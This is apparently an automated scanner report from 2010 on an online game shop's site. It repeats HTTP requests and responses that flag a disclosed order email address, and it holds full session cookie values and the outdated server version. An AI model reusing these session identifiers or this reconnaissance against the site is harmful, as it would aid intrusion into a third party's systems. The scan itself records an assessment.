GET /interact/atoz__aa.html HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:47 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:48 GMT Cache-control: no-cache
The following email address was disclosed in the response:
orders@areyougame.com
Request
GET /interact/catalog.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:41 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:40 GMT Cache-control: no-cache
<script language="JavaScript">
var g_bHasLoggedOn = false;
var g_strMemID = ""; var g_strWebAddressSecure = "https://www.areyougame.com/Interact/"; var g_strWebAddress = "http://www.a ...[SNIP]... <a href="mailto:orders@areyougame.com"> ...[SNIP]...
The following email address was disclosed in the response:
orders@areyougame.com
Request
GET /interact/category.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:22 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:22 GMT Set-Cookie: cart%5Freferer=%2Finteract%2Fcategory%2Easp%3F; domain=.areyougame.com; path=/ Cache-control: no-cache
The following email address was disclosed in the response:
orders@areyougame.com
Request
GET /interact/default.asp HTTP/1.1 Host: www.areyougame.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LogSessionID=96699467; AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=222988107.279130543.1293356328.1293356328.1293356328.1; __utmc=222988107; __utmb=222988107.1.10.1293356328; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 03:50:41 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 02:50:42 GMT Cache-control: no-cache
<script language="JavaScript">
var g_bHasLoggedOn = false;
var g_strMemID = ""; var g_strWebAddressSecure = "https://www.areyougame.com/Interact/"; var g_strWebAddress = "http://www.a ...[SNIP]... <a href="mailto:orders@areyougame.com"> ...[SNIP]...
The following email address was disclosed in the response:
orders@areyougame.com
Request
GET /interact/item.asp?itemno=IF13035 HTTP/1.1 Host: www.areyougame.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LogSessionID=96699467; AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 03:50:25 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 02:50:24 GMT Cache-control: no-cache
The following email address was disclosed in the response:
orders@areyougame.com
Request
GET /interact/logon.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:17 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:16 GMT Cache-control: no-cache
<script language="JavaScript">
var g_bHasLoggedOn = false;
var g_strMemID = ""; var g_strWebAddressSecure = "https://www.areyougame.com/Interact/"; var g_strWebAddress = "http://www.a ...[SNIP]... <a href="mailto:orders@areyougame.com"> ...[SNIP]...
The following email address was disclosed in the response:
orders@areyougame.com
Request
GET /interact/newsletter.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:37 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:38 GMT Set-Cookie: cart%5Freferer=%2Finteract%2Fnewsletter%2Easp%3F; domain=.areyougame.com; path=/ Cache-control: no-cache
<script language="JavaScript">
var g_bHasLoggedOn = false;
var g_strMemID = ""; var g_strWebAddressSecure = "https://www.areyougame.com/Interact/"; var g_strWebAddress = "http://www.a ...[SNIP]... <a href="mailto:orders@areyougame.com"> ...[SNIP]...
The following email address was disclosed in the response:
orders@areyougame.com
Request
GET /interact/refer.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:31 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:32 GMT Cache-control: no-cache
<script language="JavaScript">
// Returns true if each character in strToValidate exists in strValidChars function IsValidAllChars(strToValidate, strValidChars) { var bValid = true;
// loo ...[SNIP]... <a href="mailto:orders@areyougame.com"> ...[SNIP]...
The following email address was disclosed in the response:
orders@areyougame.com
Request
GET /interact/review.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:31 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:32 GMT Cache-control: no-cache
<script language="JavaScript">
// Returns true if each character in strToValidate exists in strValidChars function IsValidAllChars(strToValidate, strValidChars) { var bValid = true;
// loo ...[SNIP]... <a href="mailto:orders@areyougame.com">orders@areyougame.com</a> ...[SNIP]... <a href="mailto:orders@areyougame.com"> ...[SNIP]...
The following email address was disclosed in the response:
orders@areyougame.com
Request
GET /interact/view_cart.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:35 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:36 GMT Set-Cookie: cart%5Freferer=default%2Easp; domain=.areyougame.com; path=/ Cache-control: no-cache
<script language="JavaScript">
var g_bHasLoggedOn = false;
var g_strMemID = ""; var g_strWebAddressSecure = "https://www.areyougame.com/Interact/"; var g_strWebAddress = "http://www.a ...[SNIP]... <a href="mailto:orders@areyougame.com"> ...[SNIP]...
The following email address was disclosed in the response:
orders@areyougame.com
Request
GET /Interact/ HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:57 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:58 GMT Cache-control: no-cache
<script language="JavaScript">
var g_bHasLoggedOn = false;
var g_strMemID = ""; var g_strWebAddressSecure = "https://www.areyougame.com/Interact/"; var g_strWebAddress = "http://www.a ...[SNIP]... <a href="mailto:orders@areyougame.com"> ...[SNIP]...
The following email address was disclosed in the response:
orders@areyougame.com
Request
GET /Interact/logon.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:32 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:32 GMT Cache-control: no-cache
<script language="JavaScript">
var g_bHasLoggedOn = false;
var g_strMemID = ""; var g_strWebAddressSecure = "https://www.areyougame.com/Interact/"; var g_strWebAddress = "http://www.a ...[SNIP]... <a href="mailto:orders@areyougame.com"> ...[SNIP]...
Report generated by XSS.CX at Mon Dec 27 10:28:39 CST 2010.